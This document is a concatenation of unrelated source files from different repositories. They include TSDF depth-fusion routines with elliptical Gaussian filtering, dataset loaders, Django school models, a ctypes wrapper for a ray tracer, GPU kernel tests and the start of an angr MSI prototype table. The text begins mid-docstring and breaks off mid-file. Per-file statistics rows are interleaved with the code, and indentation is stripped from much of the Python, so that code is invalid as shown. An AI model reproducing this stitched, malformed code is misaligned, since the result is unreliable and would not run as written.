Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
    with a circular 2D Gaussian filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate:
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
depth_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
depth_sum += weight * surface_depth
weights_sum += weight
if depth_sum <= 0.0:
continue
final_depth = depth_sum / weights_sum
# signed distance from surface to voxel along camera axis
signed_distance = final_depth - voxel_camera[2]
field[y_field, x_field] = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
return field
def generate_tsdf_2d_ewa_tsdf(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of TSDF values based on corresponding depth
values from the provided image.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
    with a circular 2D Gaussian filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate: pixel row in the depth image to use for TSDF generation
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
tsdf_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
# signed distance from surface to voxel along camera axis
signed_distance = surface_depth - voxel_camera[2]
tsdf_value = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
tsdf_sum += weight * tsdf_value
weights_sum += weight
if weights_sum == 0.0:
continue
field[y_field, x_field] = tsdf_sum / weights_sum
return field
def generate_tsdf_2d_ewa_tsdf_inclusive(depth_image, camera, image_y_coordinate,
camera_extrinsic_matrix=np.eye(4, dtype=np.float32),
field_size=128, default_value=1, voxel_size=0.004,
array_offset=np.array([-64, -64, 64]),
narrow_band_width_voxels=20, back_cutoff_voxels=np.inf,
gaussian_covariance_scale=1.0):
"""
Generate 2D TSDF field based on elliptical Gaussian averages (EWA) of TSDF values based on corresponding depth
values from the provided image. When the sampling range for a particular voxel partially falls outside the image,
tsdf value of 1.0 is used during averaging for points that are outside.
Elliptical Gaussian filters are projected from spherical 3D Gaussian functions onto the depth image and convolved
    with a circular 2D Gaussian filter before averaging the depth values.
:param narrow_band_width_voxels: desired width, in voxels, of the narrow band (non-truncated region) of the TSDF
:param array_offset: assumes camera is at array_offset voxels relative to TSDF grid
:param camera_extrinsic_matrix: matrix representing transformation of the camera (incl. rotation and translation)
[ R | T]
[ 0 | 1]
:param voxel_size: voxel size, in meters
:param default_value: default initial TSDF value
:param field_size:
:param depth_image:
:type depth_image: np.ndarray
:param camera:
:type camera: calib.camera.DepthCamera
:param image_y_coordinate: pixel row in the depth image to use for TSDF generation
:type image_y_coordinate: int
:param gaussian_covariance_scale: scaling of the 3D gaussian, which controls the amount of smoothing
:type gaussian_covariance_scale: float
:return: resulting 2D TSDF
"""
# TODO: use back_cutoff_voxels for additional limit
if default_value == 1:
field = np.ones((field_size, field_size), dtype=np.float32)
elif default_value == 0:
field = np.zeros((field_size, field_size), dtype=np.float32)
else:
field = np.ndarray((field_size, field_size), dtype=np.float32)
field.fill(default_value)
camera_intrinsic_matrix = camera.intrinsics.intrinsic_matrix
depth_ratio = camera.depth_unit_ratio
narrow_band_half_width = narrow_band_width_voxels / 2 * voxel_size # in metric units
w_voxel = 1.0
y_voxel = 0
camera_rotation_matrix = camera_extrinsic_matrix[0:3, 0:3]
covariance_voxel_sphere_world_space = np.eye(3) * (gaussian_covariance_scale * voxel_size)
covariance_camera_space = camera_rotation_matrix.dot(covariance_voxel_sphere_world_space) \
.dot(camera_rotation_matrix.T)
image_space_scaling_matrix = camera_intrinsic_matrix[0:2, 0:2].copy()
squared_radius_threshold = 4.0 * gaussian_covariance_scale * voxel_size
for y_field in range(field_size):
for x_field in range(field_size):
x_voxel = (x_field + array_offset[0]) * voxel_size
z_voxel = (y_field + array_offset[2]) * voxel_size
voxel_world = np.array([[x_voxel, y_voxel, z_voxel, w_voxel]], dtype=np.float32).T
voxel_camera = camera_extrinsic_matrix.dot(voxel_world).flatten()[:3]
if voxel_camera[2] <= near_clipping_distance:
continue
voxel_image = (camera_intrinsic_matrix.dot(voxel_camera) / voxel_camera[2])[:2]
voxel_image[1] = image_y_coordinate
voxel_image = voxel_image.reshape(-1, 1)
x_image = voxel_image[0]
y_image = voxel_image[1]
margin = 3
if y_image < -margin or y_image >= depth_image.shape[0] + margin \
or x_image < -margin or x_image >= depth_image.shape[1] + margin:
continue
# distance along ray from camera to voxel
ray_distance = np.linalg.norm(voxel_camera)
# squared distance along optical axis from camera to voxel
z_cam_squared = voxel_camera[2] ** 2
projection_jacobian = \
np.array([[1 / voxel_camera[2], 0, -voxel_camera[0] / z_cam_squared],
[0, 1 / voxel_camera[2], -voxel_camera[1] / z_cam_squared],
[voxel_camera[0] / ray_distance, voxel_camera[1] / ray_distance,
voxel_camera[2] / ray_distance]])
remapped_covariance = projection_jacobian.dot(covariance_camera_space) \
.dot(projection_jacobian.T)
final_covariance = image_space_scaling_matrix.dot(remapped_covariance[0:2, 0:2]).dot(
image_space_scaling_matrix.T) + np.eye(2)
Q = np.linalg.inv(final_covariance)
gaussian = eg.EllipticalGaussian(eg.ImplicitEllipse(Q=Q, F=squared_radius_threshold))
bounds_max = gaussian.ellipse.get_bounds()
result = find_sampling_bounds_inclusive_helper(bounds_max, depth_image, voxel_image)
if result is None:
continue
else:
(start_x, end_x, start_y, end_y) = result
weights_sum = 0.0
tsdf_sum = 0.0
for y_sample in range(start_y, end_y):
for x_sample in range(start_x, end_x):
sample_centered = np.array([[x_sample],
[y_sample]], dtype=np.float64) - voxel_image
dist_sq = gaussian.get_distance_from_center_squared(sample_centered)
if dist_sq > squared_radius_threshold:
continue
weight = gaussian.compute(dist_sq)
if y_sample < 0 or y_sample >= depth_image.shape[0] \
or x_sample < 0 or x_sample >= depth_image.shape[1]:
tsdf_sum += weight * 1.0
else:
surface_depth = depth_image[y_sample, x_sample] * depth_ratio
if surface_depth <= 0.0:
continue
# signed distance from surface to voxel along camera axis
signed_distance = surface_depth - voxel_camera[2]
tsdf_value = common.compute_tsdf_value(signed_distance, narrow_band_half_width)
tsdf_sum += weight * tsdf_value
weights_sum += weight
if weights_sum == 0.0:
continue
field[y_field, x_field] = tsdf_sum / weights_sum
return field
generate_tsdf_2d_ewa_functions = {
cpp_module.tsdf.FilteringMethod.EWA_IMAGE_SPACE: generate_tsdf_2d_ewa_image,
cpp_module.tsdf.FilteringMethod.EWA_VOXEL_SPACE: generate_tsdf_2d_ewa_tsdf,
cpp_module.tsdf.FilteringMethod.EWA_VOXEL_SPACE_INCLUSIVE: generate_tsdf_2d_ewa_tsdf_inclusive,
}
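The mapping above selects a 2D generator by a `FilteringMethod` enum coming from the C++ bindings. The dispatch pattern itself can be sketched with a stand-in enum (the names mirror, but are not, the real `cpp_module.tsdf.FilteringMethod`, and the lambdas stand in for the generator functions):

```python
from enum import Enum, auto

class FilteringMethod(Enum):  # stand-in for cpp_module.tsdf.FilteringMethod
    EWA_IMAGE_SPACE = auto()
    EWA_VOXEL_SPACE = auto()
    EWA_VOXEL_SPACE_INCLUSIVE = auto()

generators = {
    FilteringMethod.EWA_IMAGE_SPACE: lambda: "average depths, then truncate",
    FilteringMethod.EWA_VOXEL_SPACE: lambda: "truncate per sample, then average",
    FilteringMethod.EWA_VOXEL_SPACE_INCLUSIVE: lambda: "as voxel-space, padding off-image samples with +1",
}
print(generators[FilteringMethod.EWA_IMAGE_SPACE]())
# -> average depths, then truncate
```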
# ---- File: src/data/layout.py (shendu-sw/TFR-HSS-Benchmark, MIT) ----
# -*- encoding: utf-8 -*-
"""Layout dataset
"""
import os
from .loadresponse import LoadResponse, LoadPointResponse, LoadVecResponse, mat_loader
class LayoutDataset(LoadResponse):
    """Layout dataset (multiple files) generated by 'layout-generator'."""
def __init__(
self,
root,
list_path=None,
train=True,
transform=None,
target_transform=None,
load_name="u_obs",
resp_name="u",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
extensions="mat",
transform=transform,
target_transform=target_transform,
)
class LayoutPointDataset(LoadPointResponse):
def __init__(
self,
root,
list_path=None,
train=True,
load_name="u_obs",
resp_name="u",
layout_name="F",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
layout_name=layout_name,
extensions="mat",
)
class LayoutVecDataset(LoadVecResponse):
    """Layout dataset (multiple files) generated by 'layout-generator'."""
def __init__(
self,
root,
list_path=None,
train=True,
transform=None,
div_num=4,
target_transform=None,
load_name="u_obs",
resp_name="u",
):
test_name = os.path.splitext(os.path.basename(list_path))[0]
subdir = (
os.path.join("train", "train") if train else os.path.join("test", test_name)
)
# find the path of the list of train/test samples
list_path = os.path.join(root, list_path)
# find the root path of the samples
root = os.path.join(root, subdir)
super().__init__(
root,
mat_loader,
list_path,
load_name=load_name,
resp_name=resp_name,
extensions="mat",
div_num=div_num,
transform=transform,
target_transform=target_transform,
)
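All three dataset classes repeat the same path convention, noted by their inline comments: training samples live under `train/train`, test samples under `test/<list-name>`. Extracted as a standalone sketch (the function name is hypothetical):

```python
import os

def resolve_sample_paths(root, list_path, train):
    # Mirrors the path logic repeated in the three dataset classes above.
    test_name = os.path.splitext(os.path.basename(list_path))[0]
    subdir = os.path.join("train", "train") if train else os.path.join("test", test_name)
    return os.path.join(root, list_path), os.path.join(root, subdir)

print(resolve_sample_paths("data", "test_list.txt", train=False))
# On POSIX: ('data/test_list.txt', 'data/test/test_list')
```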
# ---- File: base_de_dados/usuarios/models.py (thaynagome/DjangoEscola, Apache-2.0) ----
from django.db import models
class categoria(models.Model):
nome = models.CharField(max_length=100)
dt_criacao = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.nome
class usuario(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
data_acesso = models.DateTimeField(auto_now_add=True)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "usuarios"
def __str__(self):
return self.nome
class professor(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
salario = models.DecimalField(max_digits=7, decimal_places=2)
data_acesso = models.DateTimeField(auto_now_add=True)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "professores"
def __str__(self):
return self.nome
class aluno(models.Model):
nome = models.CharField(max_length=100)
cpf = models.CharField(max_length=11, blank=True, null=True)
dtNascimento = models.DateField(blank=True, null=True, verbose_name='Data de nascimento')
nrTelCelular = models.CharField(max_length=11, blank=True, null=True, verbose_name='Nº telefone celular')
curso = models.CharField(max_length=100)
mensalidade = models.DecimalField(max_digits=7, decimal_places=2)
categoria = models.ForeignKey(categoria, on_delete=models.CASCADE)
data_acesso = models.DateTimeField(auto_now_add=True)
observacoes = models.TextField(null=True, blank=True)
class Meta:
verbose_name_plural = "alunos"
def __str__(self):
return self.nome | 41.125 | 109 | 0.737299 | 299 | 2,303 | 5.48495 | 0.210702 | 0.065854 | 0.120732 | 0.160976 | 0.929268 | 0.912805 | 0.878049 | 0.825 | 0.688415 | 0.688415 | 0 | 0.015955 | 0.156318 | 2,303 | 56 | 110 | 41.125 | 0.828101 | 0 | 0 | 0.733333 | 0 | 0 | 0.059028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.022222 | 0.088889 | 0.933333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
901b05ad82dbba361342cea4fcbc199d9b430ccd | 131 | py | Python | pineboolib/fllegacy/flparameterquery.py | deavid/pineboo | acc96ab6d5b8bb182990af6dea4bf0986af15549 | ["MIT"]

from pineboolib.application.database.pnparameterquery import PNParameterQuery


class FLParameterQuery(PNParameterQuery):
    pass
9036c20e4a113a0e27c0d8b02a144299c2a88179 | 5,579 | py | Python | src/IceRayPy/core/geometry/transform.py | dmilos/IceRay | 4e01f141363c0d126d3c700c1f5f892967e3d520 | ["MIT-0"]

import ctypes
import IceRayPy
import IceRayPy.type
import IceRayPy.type.basic        # used below but not imported in the original
import IceRayPy.type.math.affine
import IceRayPy.type.math.coord
import IceRayPy.type.math.matrix  # used below but not imported in the original

Pointer = ctypes.POINTER
AddresOf = ctypes.addressof  # (sic) original spelling kept

#Scalar = IceRayPy.type.basic.Scalar
VoidPtr = IceRayPy.type.basic.VoidPtr
Integer = IceRayPy.type.basic.Integer

Coord3D = IceRayPy.type.math.coord.Scalar3D
Affine3D = IceRayPy.type.math.affine.Scalar3D
Matrix4D = IceRayPy.type.math.matrix.Scalar4D


class Identity:
    def __init__(self, P_dll, P_child=None):
        self.m_cargo = {}
        self.m_cargo['dll'] = P_dll
        self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Identity0()
        self.child(IceRayPy.core.geometry.simple.Sphere(P_dll))
        # NOTE: unlike the other transforms, P_child is accepted here but never used.

    def __del__(self):
        self.m_cargo['dll'].IceRayC_Geometry_Release(self.m_cargo['this'])
        self.m_cargo['child'] = None

    # NOTE: Python has no method overloading -- this zero-argument getter is
    # shadowed by the setter defined just below, which is the one that survives.
    def child(self):
        return self.m_cargo['child']

    def child(self, P_child):
        self.m_cargo['child'] = P_child
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Identity_Child(self.m_cargo['this'], P_child.m_cargo['this'])


class Translate:
    def __init__(self, P_dll, P_child=None, P_move=None):
        self.m_cargo = {}
        self.m_cargo['dll'] = P_dll
        self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate0()
        self.child(IceRayPy.core.geometry.simple.Sphere(P_dll))
        if P_child is not None:
            self.child(P_child)

    def __del__(self):
        self.m_cargo['dll'].IceRayC_Geometry_Release(self.m_cargo['this'])
        self.m_cargo['child'] = None

    # NOTE: shadowed by the setter below (see Identity.child).
    def child(self):
        return self.m_cargo['child']

    def child(self, P_child):
        self.m_cargo['child'] = P_child
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate_Child(self.m_cargo['this'], P_child.m_cargo['this'])

    def move(self, P_move: Coord3D):
        return self.m_cargo['dll'].IceRayC_Geometry_Transform_Translate_Move(self.m_cargo['this'], AddresOf(P_move))


class Affine:
    def __init__(self, P_dll, P_child=None, P_affine=None):
        self.m_cargo = {}
        self.m_cargo['dll'] = P_dll
        self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine0()
        self.child(IceRayPy.core.geometry.simple.Sphere(P_dll))
        if P_child is not None:
            self.child(P_child)

    def __del__(self):
        self.m_cargo['dll'].IceRayC_Geometry_Release(self.m_cargo['this'])
        self.m_cargo['child'] = None

    # NOTE: shadowed by the setter below (see Identity.child).
    def child(self):
        return self.m_cargo['child']

    def child(self, P_child):
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_Child(self.m_cargo['this'], P_child.m_cargo['this'])
        self.m_cargo['child'] = P_child

    def toWorldGet(self):
        result = Affine3D()
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2World_Get(self.m_cargo['this'], AddresOf(result))
        return result

    def toWorldSet(self, P_2world: Affine3D):
        return self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2World_Set(self.m_cargo['this'], AddresOf(P_2world))

    def toLocalGet(self):
        result = Affine3D()
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2Local_Get(self.m_cargo['this'], AddresOf(result))
        return result

    def toLocalSet(self, P_2local: Affine3D):
        return self.m_cargo['dll'].IceRayC_Geometry_Transform_Affine_2Local_Set(self.m_cargo['this'], AddresOf(P_2local))

    def move(self, P_move: Coord3D):
        pass  # TODO

    def scaleV(self, P_move: Coord3D):
        pass  # TODO

    def rotateX(self, P_alpha):
        pass  # TODO

    def rotateY(self, P_alpha):
        pass  # TODO

    def rotateZ(self, P_alpha):
        pass  # TODO

    def rotateA(self, P_direction: Coord3D, P_alpha):
        pass  # TODO


class Homography:
    def __init__(self, P_dll, P_child=None, P_affine=None):
        self.m_cargo = {}
        self.m_cargo['dll'] = P_dll
        self.m_cargo['this'] = self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography0()
        self.child(IceRayPy.core.geometry.simple.Sphere(P_dll))
        if P_child is not None:
            self.child(P_child)

    def __del__(self):
        self.m_cargo['dll'].IceRayC_Geometry_Release(self.m_cargo['this'])
        self.m_cargo['child'] = None

    # NOTE: shadowed by the setter below (see Identity.child).
    def child(self):
        return self.m_cargo['child']

    def child(self, P_child):
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_Child(self.m_cargo['this'], P_child.m_cargo['this'])
        self.m_cargo['child'] = P_child

    def toWorldGet(self):
        result = Matrix4D()
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2World_Get(self.m_cargo['this'], AddresOf(result))
        return result

    def toWorldSet(self, P_2world: Matrix4D):
        return self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2World_Set(self.m_cargo['this'], AddresOf(P_2world))

    def toLocalGet(self):
        result = Matrix4D()
        self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2Local_Get(self.m_cargo['this'], AddresOf(result))
        return result

    def toLocalSet(self, P_2local: Matrix4D):
        return self.m_cargo['dll'].IceRayC_Geometry_Transform_Homography_2Local_Set(self.m_cargo['this'], AddresOf(P_2local))
5f67c8e61bdd8fd2cfe6266b2e05f922471962da | 134 | py | Python | versions/util/__init__.py | DocTocToc/cleanerversion | becadbab5d7b474a0e9a596b99e97682402d2f2c | ["Apache-2.0"]

import datetime

from django.utils.timezone import utc


def get_utc_now():
    return datetime.datetime.utcnow().replace(tzinfo=utc)
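`datetime.utcnow()` returns a naive value that the helper above patches with Django's `utc` object; the standard library alone can produce an aware UTC timestamp directly (and `utcnow()` is deprecated in recent Python versions). A dependency-free sketch of the same helper:

```python
from datetime import datetime, timezone

def get_utc_now():
    # Aware UTC timestamp; no Django import needed.
    return datetime.now(timezone.utc)

now = get_utc_now()
assert now.tzinfo is not None                      # aware, not naive
assert now.utcoffset().total_seconds() == 0        # offset is exactly UTC
```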
3971f26f22a5077791300e2bb60451100b433ed4 | 691 | py | Python | Tensile/Tests/nightly/fractional/test_fractional.py | zjunweihit/Tensile | 68b73083c92eecc1b04eec1f006f28aea5628030 | ["MIT"]

import Tensile.Tensile as Tensile


def test_dgemm_fractional_tile_sweep(tmpdir):
    Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_dgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])


def test_hgemm_fractional_tile_sweep(tmpdir):
    Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_hgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])


def test_sgemm_fractional_edge(tmpdir):
    Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_sgemm_fractional_edge.yaml"), tmpdir.strpath])


def test_sgemm_fractional_tile_sweep(tmpdir):
    Tensile.Tensile([Tensile.TensileTestPath("nightly/fractional/test_sgemm_fractional_tile_sweep.yaml"), tmpdir.strpath])
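The four tests above differ only in the YAML path. A table-driven sketch of the same shape (plain Python; `pytest.mark.parametrize` would be the idiomatic pytest spelling, and `run_case` is a made-up stand-in for the `Tensile.Tensile([...])` call):

```python
CASES = [
    "nightly/fractional/test_dgemm_fractional_tile_sweep.yaml",
    "nightly/fractional/test_hgemm_fractional_tile_sweep.yaml",
    "nightly/fractional/test_sgemm_fractional_edge.yaml",
    "nightly/fractional/test_sgemm_fractional_tile_sweep.yaml",
]

def run_case(yaml_path, workdir):
    # Stand-in for Tensile.Tensile([Tensile.TensileTestPath(yaml_path), workdir])
    return f"{workdir}/{yaml_path}"

results = [run_case(c, "/tmp/run") for c in CASES]
print(len(results))  # 4
```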
39b355de9b26bf74516a81a40effb7eef22be6fe | 611 | py | Python | pfstratsim/utils/__init__.py | aarondorffeld/portfolio-strategy-simulation | 8c4771df24e3c45865c7df2a68e51ef018f7be1b | ["MIT"]

from .parameter_calculation import (
    calc_asset_returns, calc_asset_obsrvd_returns, calc_asset_obsrvd_risks, calc_corr_cf,
    calc_asset_expctd_returns, calc_asset_expctd_risks,
    calc_prtfl_obsrvd_return, calc_prtfl_obsrvd_risk,
)
from .parameter_setting import read_params
from .plotting import plot

__all__ = [
    "calc_asset_returns",
    "calc_asset_obsrvd_returns",
    "calc_asset_obsrvd_risks",
    "calc_corr_cf",
    "calc_asset_expctd_returns",
    "calc_asset_expctd_risks",
    "calc_prtfl_obsrvd_return",
    "calc_prtfl_obsrvd_risk",
    "read_params",
    "plot",
]
f2d35c0b892ea6cb0c929a246b521b441e3b20df | 111,815 | py | Python | angr/procedures/definitions/win32_msi.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | ["BSD-2-Clause"]

# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("msi.dll")
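Most exports in the prototypes table below come in ANSI/Unicode pairs (`…A` takes `SimTypeChar(label="Byte")` strings, `…W` takes `SimTypeChar(label="Char")` strings). A small, hypothetical helper showing how such Win32 export names group by suffix:

```python
def pair_ansi_unicode(names):
    """Group Win32 export names into base -> {'A', 'W'} suffix sets."""
    pairs = {}
    for n in names:
        if len(n) > 1 and n[-1] in "AW":
            pairs.setdefault(n[:-1], set()).add(n[-1])
    # Keep only names that exist in both encodings.
    return {base: s for base, s in pairs.items() if s == {"A", "W"}}

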